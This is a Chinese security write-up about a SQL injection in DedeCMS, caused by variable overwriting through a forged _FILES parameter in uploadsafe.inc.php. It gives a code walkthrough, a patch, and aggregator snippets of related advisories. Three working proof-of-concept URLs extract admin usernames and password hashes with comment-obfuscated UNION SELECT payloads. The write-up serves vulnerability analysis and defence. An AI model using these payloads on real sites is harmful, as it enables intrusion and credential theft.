dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

1. 漏洞描述

1. dedecms原生提供一个"本地变量注册"的模拟实现,原则上允许黑客覆盖任意变量
2. dedecms在实现本地变量注册的时候,会对$_GET、$_POST、$_COOKIE等的value值进行addslash转移过滤处理
//$key值注入不在本文讨论范围内,详情参阅:http://www.cnblogs.com/LittleHann/p/4505694.html
3. 在处理文件上传的逻辑中,存在一条攻击路径,程序自己"反处理"了addslash逻辑,使用于闭合的单引号重新获得攻击效果,造成SQL注入

Relevant Link:

http://0day5.com/archives/1346

2. 漏洞触发条件

0x1: POC1

plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%[email protected]`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

?action=
&aid=1
&_FILES[type][tmp_name]=\%27%20or%[email protected]`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+
&_FILES[type][name]=1.jpg
&_FILES[type][type]=application/octet-stream
&_FILES[type][size]=4294

0x2: POC2

http://DEDD/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\‘  or [email protected]`\‘` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%[email protected]__admin` limit+0,1),5,6,7,8,9%[email protected]`\‘`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6873

0x3: POC3

http://DEDE/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\‘and+char(@`‘`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,group_concat(userid,0x23,pwd),5,6,7,8,9 from `%[email protected]__admin`%23

0x4: POC入侵方式

1. 原始数据
\%27%20or%[email protected]`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+

2.URL提交进来后,\ 和 ’ 分别被转义成 \\ 和 \’
\\\‘ or [email protected]`\\\‘`/*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from`#@__admin` limit 0,1),5,6,7,8,9#@`\\\‘`

3.URL被带入include/common.inc.php中检查,此步数据未发生变化

4.然后来到了include/uploadsafe.inc.php中,经过第行str_replace后,\\被过滤成了\,用于攻击闭合的单引号重新获得攻击能力
$$_key = $_FILES[$_key][‘tmp_name‘] =str_replace("\\\\", "\\", $_FILES[$_key][‘tmp_name‘]);
\\‘ or [email protected]`\\‘`/*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from`#@__admin` limit 0,1),5,6,7,8,9#@`\\‘`
此时引号被成功的带入了查询语句中

5.回到plus/recommend.php中,第38行,此时SQL语句被拼成如下:
SELECT s.*,t.* FROM `#@_member_stow` AS sLEFT JOIN `#@__member_stowtype` AS t ON s.type=t.stowname WHERE s.aid=‘1‘ ANDs.type=‘\\‘ or [email protected]`\\‘` /*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd) from `#@__admin` limit 0,1),5,6,7,8,9#@`\\‘` ‘

Relevant Link:

http://www.xuebuyuan.com/2095280.html
http://0day5.com/archives/1346
http://loudong.360.cn/blog/view/id/17

3. 漏洞影响范围
4. 漏洞代码分析

从/plus/recommand.php开始逐步分析

require_once(dirname(__FILE__)."/../include/common.inc.php");
..

/include/common.inc.php

..
function _RunMagicQuotes(&$svar)
{
    if(!get_magic_quotes_gpc())
    {
        if( is_array($svar) )
        {
            foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
        }
        else
        {
            if( strlen($svar)>0 && preg_match(‘#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#‘,$svar) )
            {
              exit(‘Request var not allow!‘);
            }
            $svar = addslashes($svar);
        }
    }
    return $svar;
}
..

只要提交的URL中不包含cfg_|GLOBALS|_GET|_POST|_COOKIE,即可通过检查,_FILES[type][tmp_name]被带入
引发漏洞的入口点在/include/uploadsafe.inc.php

..
//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数
if($_FILES)
{
    require_once(DEDEINC.‘/uploadsafe.inc.php‘);
}
..

/include/uploadsafe.inc.php

..
//URL参数中的_FILES[type][tmp_name],$_key为type,$$_key即为$type,从而导致了$type变量的覆盖
$$_key = $_FILES[$_key][‘tmp_name‘] = str_replace("\\\\","\\",$_FILES[$_key][‘tmp_name‘]);
${$_key.‘_name‘} = $_FILES[$_key][‘name‘];
${$_key.‘_type‘} = $_FILES[$_key][‘type‘] = eregi_replace(‘[^0-9a-z\./]‘,‘‘,$_FILES[$_key][‘type‘]);
${$_key.‘_size‘} = $_FILES[$_key][‘size‘] = ereg_replace(‘[^0-9]‘,‘‘,$_FILES[$_key][‘size‘]);
..

/plus/recommand.php

//读取文档信息
if($action==‘‘)
{
    if($type==‘sys‘){
    //读取文档信息
        $arcRow = GetOneArchive($aid);
        if($arcRow[‘aid‘]==‘‘)
        {
            ShowMsg("无法把未知文档推荐给好友!","-1");
            exit();
        }
        extract($arcRow, EXTR_OVERWRITE);
    }
    else
    {
        //注入语句被带入数据库查询,
        $arcRow=$dsql->GetOne("SELECT s.*,t.* FROM `#@__member_stow` AS s LEFT JOIN `#@__member_stowtype` AS t ON s.type=t.stowname WHERE s.aid=‘$aid‘ AND s.type=‘$type‘");
        if(!is_array($arcRow)){
            ShowMsg("无法把未知文档推荐给好友!","-1");
            exit();
        }
        $arcRow[‘arcurl‘]=$arcRow[‘indexurl‘]."=".$arcRow[‘aid‘];
        extract($arcRow, EXTR_OVERWRITE);
    }
}

5. 防御方法

/include/uploadsafe.inc.php

/*  */
//$$_key = $_FILES[$_key][‘tmp_name‘] = str_replace("\\\\","\\",$_FILES[$_key][‘tmp_name‘]);
$$_key = $_FILES[$_key][‘tmp_name‘];
/* */
${$_key.‘_name‘} = $_FILES[$_key][‘name‘];
${$_key.‘_type‘} = $_FILES[$_key][‘type‘] = preg_replace(‘#[^0-9a-z\./]#i‘, ‘‘, $_FILES[$_key][‘type‘]);
${$_key.‘_size‘} = $_FILES[$_key][‘size‘] = preg_replace(‘#[^0-9]#‘,‘‘,$_FILES[$_key][‘size‘]);
if(!empty(${$_key.‘_name‘}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.‘_name‘}) || !preg_match("#\.#", ${$_key.‘_name‘})) )
{
    if(!defined(‘DEDEADMIN‘))
    {
        exit(‘Not Admin Upload filetype not allow !‘);
    }
}
if(empty(${$_key.‘_size‘}))
{
    ${$_key.‘_size‘} = @filesize($$_key);
}

/* 限制上传文件类型 */
$imtypes = array
(
"image/pjpeg", "image/jpeg", "image/gif", "image/png",
"image/xpng", "image/wbmp", "image/bmp"
);

if(in_array(strtolower(trim(${$_key.‘_type‘})), $imtypes))
{
    $image_dd = @getimagesize($$_key);
    if (!is_array($image_dd))
    {
        exit(‘Upload filetype not allow !‘);
    }
}
/* */ 

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

时间: 2024-10-10 02:23:44

dedecms /include/uploadsafe.inc.php SQL Injection Via Local Variable Overriding Vul的相关文章

ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出key键注入 Relevant Link: http://bbs.ecshop.com/thread-150545-1-1.html 2. 漏洞触发条件 1. /pick_out.php漏洞未修复 2. magic_quotes_gpc = Off 0x1: POC #!/usr/bin

Metinfo /admin/include/common.inc.php SQL Injection Vul

catalog 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 Metinfo系统是基于PHP+MYSQL的信息发布系统,该系统存在逻辑缺陷导致条件注入,可修改任意管理员信息 Relevant Link: 2. 漏洞触发条件 从save_met_cookie()中可以看出,此处可执行任意sql语句.正好此处为update的met_admin_table表,所以可直接修改任意用户密码等任意操作了.比如修改密码,只需要利用m

Dedecms include\dialog\select_soft_post.php Upload Any Files To The Specified Directory Via Variable Not Initial Flaw Bypass Extension Defence

目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 综合来说,这个漏洞的根源是"register_globals = on",在这个漏洞的前提下,攻击者可以发动这样的攻击向量 1. 当前网站的"register_globals = on"已开启 2. 在代码中没有显式声明.初始化的变量 3. 在用户提交的HTML表单中提交了相同名字的字段 4. 在以上的前提下,黑客可以任意控制代码中变量的

Zabbix 3.0.3 SQL Injection

Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ========================================== Title: Zabbix 3.0.3 SQL Injection Vulnerability Product: Zabbix Vulnerable Version(s): 2.2.x, 3.0.x Fixed Version: 3.0.4 Homepage: http

Cacti /graphs_new.php SQL Injection Vulnerability

catalogue 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652 Relevant Link: http://bobao.360.cn/snapshot/in

dedecms SESSION变量覆盖导致SQL注入common.inc.php的解决方法

漏洞名称:dedecms SESSION变量覆盖导致SQL注入 补丁文件:/include/common.inc.php 补丁来源:阿里云云盾自研 漏洞描述:dedecms的/plus/advancedsearch.php中,直接从SESSION[SESSION[sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_start = 1即开始了自动SESSION会话,云盾团队在dedemcs的变量注册入口进行了通用统一防御,禁止SESSION变量的传入

SQL Injection 字典 - MSSQL

MSSQL Default Databases pubs Not available on MSSQL 2005 model Available in all versions msdb Available in all versions tempdb Available in all versions northwind Available in all versions information_schema Availalble from MSSQL 2000 and higher Comm

ref:Manual SQL injection discovery tips

ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tips August 26, 2017 According to bugbountyforum.com's AMA format one of the most popular questions is How do you test for Server Side vulnerabilities su

DeDeCMS后台批量修改替换sql语句大全

有时候后台文章内容.标题或者锚文本出错,需要修改批量修改,那么就需要用dedecms的sql语句进行批量修改了. 利用dedecms后台SQL命令行工具批量修改内容,路径和超链接等信息.语句 DEDECMS SQL命令批量替换1.更改文章中的内容update dede_addonarticle set body=replace(body,'原来的字符','替换后的字符')例子解释:update dede_addonarticle set body=replace(body,'软件下载','插件下